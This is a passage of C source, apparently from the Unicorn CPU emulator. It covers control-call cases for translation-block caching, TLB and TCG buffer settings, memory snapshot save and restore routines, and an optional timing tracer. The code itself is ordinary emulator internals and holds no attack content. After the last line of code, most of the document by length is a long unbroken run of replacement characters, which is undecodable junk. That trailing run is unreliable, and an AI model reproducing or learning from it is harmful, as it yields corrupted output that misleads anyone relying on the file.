UC_ERR_OK; } break; } case UC_CTL_TB_REQUEST_CACHE: { UC_INIT(uc); if (rw == UC_CTL_IO_READ_WRITE) { uint64_t addr = va_arg(args, uint64_t); uc_tb *tb = va_arg(args, uc_tb *); err = uc->uc_gen_tb(uc, addr, tb); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_TB_REMOVE_CACHE: { UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { uint64_t addr = va_arg(args, uint64_t); uint64_t end = va_arg(args, uint64_t); if (end <= addr) { err = UC_ERR_ARG; } else { uc->uc_invalidate_tb(uc, addr, end - addr); } } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_TB_FLUSH: UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { uc->tb_flush(uc); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; case UC_CTL_TLB_FLUSH: UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { uc->tcg_flush_tlb(uc); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; case UC_CTL_TLB_TYPE: { UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { int mode = va_arg(args, int); err = uc->set_tlb(uc, mode); } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; } case UC_CTL_TCG_BUFFER_SIZE: { if (rw == UC_CTL_IO_WRITE) { uint32_t size = va_arg(args, uint32_t); uc->tcg_buffer_size = size; } else { UC_INIT(uc); uint32_t *size = va_arg(args, uint32_t *); *size = uc->tcg_buffer_size; restore_jit_state(uc); } break; } case UC_CTL_CONTEXT_MODE: UC_INIT(uc); if (rw == UC_CTL_IO_WRITE) { int mode = va_arg(args, int); uc->context_content = mode; err = UC_ERR_OK; } else { err = UC_ERR_ARG; } restore_jit_state(uc); break; default: err = UC_ERR_ARG; break; } va_end(args); return err; } static uc_err uc_snapshot(struct uc_struct *uc) { if (uc->snapshot_level == INT32_MAX) { return UC_ERR_RESOURCE; } uc->snapshot_level++; return UC_ERR_OK; } static uc_err uc_restore_latest_snapshot(struct uc_struct *uc) { MemoryRegion *subregion, *subregion_next, *mr, *initial_mr; int level; QTAILQ_FOREACH_SAFE(subregion, &uc->system_memory->subregions, subregions_link, subregion_next) { uc->memory_filter_subregions(subregion, uc->snapshot_level); if (subregion->priority >= uc->snapshot_level || (!subregion->terminates && QTAILQ_EMPTY(&subregion->subregions))) { uc->memory_unmap(uc, subregion); } } for (size_t i = uc->unmapped_regions->len; i-- > 0;) { mr = g_array_index(uc->unmapped_regions, MemoryRegion *, i); // same dirty hack as in memory_moveout see qemu/softmmu/memory.c initial_mr = QTAILQ_FIRST(&mr->subregions); if (!initial_mr) { initial_mr = mr; } /* same dirty hack as in memory_moveout see qemu/softmmu/memory.c */ level = (intptr_t)mr->container; mr->container = NULL; if (level < uc->snapshot_level) { break; } if (memory_overlap(uc, mr->addr, int128_get64(mr->size))) { return UC_ERR_MAP; } uc->memory_movein(uc, mr); uc->memory_filter_subregions(mr, uc->snapshot_level); if (initial_mr != mr && QTAILQ_EMPTY(&mr->subregions)) { uc->memory_unmap(uc, subregion); } mem_map(uc, initial_mr); g_array_remove_range(uc->unmapped_regions, i, 1); } uc->snapshot_level--; return UC_ERR_OK; } #ifdef UNICORN_TRACER uc_tracer *get_tracer() { static uc_tracer tracer; return &tracer; } void trace_start(uc_tracer *tracer, trace_loc loc) { tracer->starts[loc] = get_clock(); } void trace_end(uc_tracer *tracer, trace_loc loc, const char *fmt, ...) { va_list args; int64_t end = get_clock(); va_start(args, fmt); vfprintf(stderr, fmt, args); va_end(args); fprintf(stderr, "%.6fus\n", (double)(end - tracer->starts[loc]) / (double)(1000)); } #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������